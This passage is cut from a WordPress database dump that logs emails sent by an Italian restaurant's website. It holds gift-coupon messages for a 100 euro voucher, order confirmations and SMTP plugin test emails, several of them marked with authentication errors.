0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656083www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656083solymarcouponB4WIL.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar, ristorante a Riccione','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-3','','','2020-10-25 21:01:32','2020-10-25 20:01:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-3/',0,'postman_sent_mail','',0),(1146,0,'2020-10-25 21:01:34','2020-10-25 20:01:34','\n\n\n<p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p>\n\n','Un buono regale per te - Sol Y Mar','Incorrect authentication data\r\n','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-2','','','2020-10-25 21:01:34','2020-10-25 20:01:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-2/',0,'postman_sent_mail','',0),(1147,0,'2020-10-25 21:02:15','2020-10-25 20:02:15','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1603656130www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1603656130solymarcouponB4WIL.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 23/04/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar, ristorante a Riccione','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-4','','','2020-10-25 21:02:15','2020-10-25 20:02:15','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-4/',0,'postman_sent_mail','',0),(1148,0,'2020-10-25 21:02:21','2020-10-25 20:02:21','\n\n\n<p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p>\n\n','Un buono regale per te - Sol Y Mar','Incorrect authentication data\r\n','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-3','','','2020-10-25 21:02:21','2020-10-25 20:02:21','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-3/',0,'postman_sent_mail','',0),(1149,1,'2020-10-26 08:32:32','2020-10-26 07:32:32','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>','Postman SMTP Test (www.ristorantesolymar.it)','Incorrect authentication data\r\n','private','closed','closed','','postman-smtp-test-www-ristorantesolymar-it-3','','','2020-10-26 08:32:32','2020-10-26 07:32:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/postman-smtp-test-www-ristorantesolymar-it-3/',0,'postman_sent_mail','',0),(1150,1,'2020-10-26 08:33:23','2020-10-26 07:33:23','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>','Postman SMTP Test (www.ristorantesolymar.it)','Incorrect authentication data\r\n','private','closed','closed','','postman-smtp-test-www-ristorantesolymar-it-4','','','2020-10-26 08:33:23','2020-10-26 07:33:23','',0,'https://www.ristorantesolymar.it/postman_sent_mail/postman-smtp-test-www-ristorantesolymar-it-4/',0,'postman_sent_mail','',0),(1151,1,'2020-10-26 09:49:42','2020-10-26 08:49:42','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>','Postman SMTP Test (www.ristorantesolymar.it)','Incorrect authentication data\r\n','private','closed','closed','','postman-smtp-test-www-ristorantesolymar-it-5','','','2020-10-26 09:49:42','2020-10-26 08:49:42','',0,'https://www.ristorantesolymar.it/postman_sent_mail/postman-smtp-test-www-ristorantesolymar-it-5/',0,'postman_sent_mail','',0),(1152,1,'2020-10-26 09:49:42','2020-10-26 08:49:42','Content-Type: text/plain; charset = \"UTF-8\"\r\nContent-Transfer-Encoding: 8bit\r\n\r\nHello!\r\n\r\nSent by Postman 2.0.15 - https://wordpress.org/plugins/post-smtp/\r\n\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<style type=\"text/css\" media=\"all\">\r\n.wporg-notification .im {\r\n	color: #888;\r\n} /* undo a GMail-inserted style */\r\n</style>\r\n</head>\r\n<body class=\"wporg-notification\">\r\n	<div style=\"background: #e8f6fe; font-family: &amp; quot; Helvetica Neue&amp;quot; , Helvetica ,Arial,sans-serif; font-size: 14px; color: #666; text-align: center; margin: 0; padding: 0\">\r\n		<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#e8f6fe\"	style=\"background: #e8f6fe; width: 100%;\">\r\n			<tbody>\r\n				<tr>\r\n					<td>\r\n						<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"padding: 0px; width: 100%;\"\">\r\n							<tbody>\r\n								<tr>\r\n									<td>\r\n										<div style=\"max-width: 600px; height: 400px; margin: 0 auto; overflow: hidden;background-image:url(\'https://ps.w.org/postman-smtp/assets/email/poofytoo.png\');background-repeat: no-repeat;\">\r\n											<div style=\"margin:50px 0 0 300px; width:300px; font-size:2em;\">Hello! - &#20320;&#22909; - Bonjour! - &#2344;&#2350;&#2360;&#2381;&#2340;&#2375; - ¡Hola! - Ol&#225; - &#1055;&#1088;&#1080;&#1074;&#1077;&#1090;! - &#20170;&#26085;&#12399;</div>\r\n											<div style=\"text-align:right;font-size: 1.4em; color:black;margin:150px 0 0 200px;\">Sent by Postman 2.0.15\r\n												<br/><span style=\"font-size: 0.8em\"><a style=\"color:#3f73b9\" href=\"https://wordpress.org/plugins/post-smtp/\">https://wordpress.org/plugins/post-smtp/</a></span>\r\n											</div>\r\n										</div>\r\n									</td>\r\n								</tr>\r\n							</tbody>\r\n						</table>\r\n						<br><span style=\"font-size:0.9em;color:#94c0dc;\">Image source: <a style=\"color:#94c0dc\" href=\"http://poofytoo.com\">poofytoo.com</a> - Used with permission</span>\r\n					</td>\r\n				</tr>\r\n			</tbody>\r\n		</table>\r\n</body>\r\n</html>','Postman SMTP Test (www.ristorantesolymar.it)','Sent ( ** Fallback ** )','private','closed','closed','','postman-smtp-test-www-ristorantesolymar-it-6','','','2020-10-26 09:49:42','2020-10-26 08:49:42','',0,'https://www.ristorantesolymar.it/postman_sent_mail/postman-smtp-test-www-ristorantesolymar-it-6/',0,'postman_sent_mail','',0),(1153,1,'2020-10-26 09:52:22','2020-10-26 08:52:22','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n','Un buono regale per te - Sol Y Mar','Incorrect authentication data\r\n','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-4','','','2020-10-26 09:52:22','2020-10-26 08:52:22','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-4/',0,'postman_sent_mail','',0),(1154,1,'2020-10-26 09:52:22','2020-10-26 08:52:22','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\"><p>Il coupon che hai acquistato è stato inviato via email all\'indirizzo destinatario che hai specificato durante l\'ordine.</p></body>\n</html>\n','Un buono regale per te - Sol Y Mar','Sent ( ** Fallback ** )','private','closed','closed','','un-buono-regale-per-te-sol-y-mar-5','','','2020-10-26 09:52:22','2020-10-26 08:52:22','',0,'https://www.ristorantesolymar.it/postman_sent_mail/un-buono-regale-per-te-sol-y-mar-5/',0,'postman_sent_mail','',0),(1155,1,'2020-10-26 09:52:36','2020-10-26 08:52:36','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/mwb_browse/FC219D35-A4C2-40F9-B88E-9A95FB4FD648.jpeg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Amalia e Riccardo Manduchi</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Filippo Saulle</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\"><bdi>100,00<span 